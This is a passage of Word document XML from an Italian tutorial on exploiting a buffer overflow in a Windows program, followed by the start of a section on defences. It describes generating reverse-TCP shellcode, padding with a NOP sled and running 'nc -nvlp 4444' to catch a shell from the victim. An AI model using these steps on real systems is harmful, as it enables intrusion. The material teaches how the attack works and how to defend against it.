        <w:t>odificato in base alle proprie esigenze. Qui stiamo utilizzando “windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>shell_reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>” perché il computer vittima è con sistema operativo Windows, mentre come “LHOST” bisognerà usare l’indirizzo IP</w:t>
      </w:r>
      <w:r w:rsidR="006931A7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve">v4 del computer </w:t>
      </w:r>
      <w:r w:rsidR="00792432">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>attaccante</w:t>
      </w:r>
      <w:r w:rsidR="006931A7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve">. L’ultimo argomento </w:t>
      </w:r>
      <w:r w:rsidR="006931A7" w:rsidRPr="006931A7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>-b “\x00”</w:t>
      </w:r>
      <w:r w:rsidR="006931A7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006931A7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve">sta ad indicare i </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006931A7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>bad</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006931A7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006931A7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>characters</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006931A7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve"> da sostituire, nel nostro caso non ne abbiamo, come detto sopra.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6B7AA7" w14:textId="6418EB1D" w:rsidR="00C665BE" w:rsidRDefault="006931A7" w:rsidP="00C665BE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve">Lanciando, quindi, questo comando, ci verrà restituito lo shell code da utilizzare. Apriamo l’ultimo file, script6.py ed inseriamo il codice sotto riportato. Noteremo una cosa, ovvero </w:t>
      </w:r>
      <w:r w:rsidRPr="006931A7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>“\x90”*32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="006931A7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>questo ci serve come “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>padding</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve">” tra l’indirizzo dell’EIP e lo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve">, e si chiama NOP (No </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>Operation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve">, con codice “\x90”). A questo punto, diamo i permessi al file e, prima di lanciarlo, utilizziamo il comando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006931A7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006931A7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006931A7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>nvlp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006931A7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4444</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve">, che ci permetterà di stare in ascolto sulla porta 4444 (dichiarata nel comando sopra) su </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve">. Lanciando adesso lo script, ci accorgeremo che il terminale di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve"> sarà diventato il terminale di Windows della macchina vittima, questo perché abbiamo lanciato un “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>”, che ci ha permesso di connetterci sulla porta 4444 e guadagnato il controllo della shell</w:t>
      </w:r>
      <w:r w:rsidR="00792432">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve"> del computer vittima</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B009499" w14:textId="185D34D2" w:rsidR="003714E2" w:rsidRDefault="003714E2" w:rsidP="003714E2">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EB48B31" wp14:editId="2AEBB546">
            <wp:extent cx="4015740" cy="1097280"/>
            <wp:effectExtent l="0" t="0" r="3810" b="762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41">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4015740" cy="1097280"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B07951" w14:textId="7B358E73" w:rsidR="00336633" w:rsidRDefault="008609E1" w:rsidP="00336633">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve">File: </w:t>
      </w:r>
      <w:hyperlink r:id="rId42" w:history="1">
        <w:r w:rsidRPr="008609E1">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:rFonts w:cstheme="minorHAnsi"/>
          </w:rPr>
          <w:t>script6.py</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="639A0E3F" w14:textId="70F40236" w:rsidR="008609E1" w:rsidRPr="008C1448" w:rsidRDefault="008609E1" w:rsidP="003441B6">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc76047774"/>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Conclusione sull’attacco</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="5C05D5DD" w14:textId="0E2A47BD" w:rsidR="008609E1" w:rsidRDefault="008609E1" w:rsidP="008609E1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>Ciò che abbiamo dimostrato è che semplicemente con un buffer di caratteri siamo riusciti a sovrascrivere i registri del nostro software vulnerabile e siamo riusciti a fargli eseguire del codice malevolo, ottenendo così il controllo della shell del computer vittima. Ecco perché non bisogna mai sottovalutare questo tipo di attacco!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8D2752" w14:textId="5E0B7D76" w:rsidR="008609E1" w:rsidRPr="003441B6" w:rsidRDefault="008609E1" w:rsidP="003441B6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E988DB5" w14:textId="0C8617B5" w:rsidR="008609E1" w:rsidRPr="008C1448" w:rsidRDefault="008609E1" w:rsidP="008C1448">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc76047775"/>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Come difendersi</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="0F482278" w14:textId="2A304575" w:rsidR="008609E1" w:rsidRPr="008C1448" w:rsidRDefault="008609E1" w:rsidP="003441B6">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc76047776"/>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5.1</w:t>
      </w:r>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Difesa</w:t>
      </w:r>
      <w:r w:rsidR="0062275C" w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> a livello di linguaggio</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="2EE0AC35" w14:textId="40331D2F" w:rsidR="0062275C" w:rsidRPr="0062275C" w:rsidRDefault="0062275C" w:rsidP="0062275C">
      <w:pPr>
        <w:pStyle w:val="NormaleWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>La miglior difesa da attacchi basati sul buffer overflow sta nella scelta di un linguaggio di programmazione che fornisca controlli automatici sulla dimensione dei buffer (o a tempo di compilazione o a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>runtime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) come Java, Python o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Perl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Se questa opzione può essere presa in considerazione per lo sviluppo di nuovi programmi, resta però difficilmente applicabile nel caso di progetti esistenti, in cui ciò comporterebbe la riscrittura del codice nel nuovo linguaggio</w:t>
      </w:r>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3B3E3F" w14:textId="03F37C01" w:rsidR="0062275C" w:rsidRDefault="0062275C" w:rsidP="0062275C">
      <w:pPr>
        <w:pStyle w:val="NormaleWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Un'alternativa consiste nell'utilizzo di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>safe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> libraries</w:t>
      </w:r>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, ovvero librerie di funzioni che implementano protezioni contro il buffer overflow: in C rappresentano funzioni vulnerabili </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>strcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>strcpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>gets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sprintf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> (e altre ancora...) di cui esistono controparti "sicure" come </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>strncpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>strncat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>snprintf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0062275C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Un esempio di queste </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
